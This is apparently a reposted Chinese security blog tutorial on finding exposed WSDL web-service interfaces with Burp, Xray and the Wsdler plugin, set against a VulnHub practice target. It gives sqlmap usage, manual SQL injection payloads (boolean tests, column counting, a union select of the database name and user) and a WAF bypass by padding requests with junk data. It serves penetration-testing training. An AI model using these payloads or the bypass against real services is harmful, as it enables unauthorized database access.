作者不对因阅读本文后采取的任何行动所造成的任何形式的损害负责,包括但不限于直接、间接、特殊、附带或后果性的损害。用户应自行承担使用这些信息的风险。
我们鼓励所有读者遵守法律法规,负责任地使用技术知识,共同维护网络空间的安全与和谐。
-
WSDL(Web Services Description Language)即网络服务描述语言,用于描述Web服务的公共接口。这是一个基于XML的关于如何与Web服务通讯和使用的服务描述;也就是描述与目录中列出的Web服务进行交互时需要绑定的协议和信息格式。通常采用抽象语言描述该服务支持的操作和信息,使用的时候再将实际的网络协议和信息格式绑定给该服务。
WSDL接口管理页面特征
利用思路
-
靶机下载地址https://www.vulnhub.com/entry/csharp-vulnsoap,135/
Burp+Xray
-
xray与Burp联动,进行被动扫描
Burp插件-Wsdler+sqlmap
-
插件下载:直接商城下载
-
然后在Wsdler查看泄露接口
-
复制请求数据包为txt格式,用sqlmap测试
sqlmap.py -r 1.txt
Burp插件-Wsdler+手工测试(sql注入)
-
在Wsdler查看泄露接口
-
将数据包发送到Repeater中,手动改包,然后重放
-
-
可以使用以下语句判断是否存在SQL注入
-
'or 1=1 --+'or1=2--+
-
-
判断字段数
-
'or 1=1 order by 2--+'or1=1orderby3--+
-
-
查询当前用户和数据库
-
' union select current_database(),user--
- 一个wsdl接口
- 发送请求,有waf,添加一个a标签填充垃圾数据
- 查询权限
- 数据库版本
- sqlmap梭哈
原文始发于微信公众号(Syst1m Sec):WSDL接口利用+Bypass
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论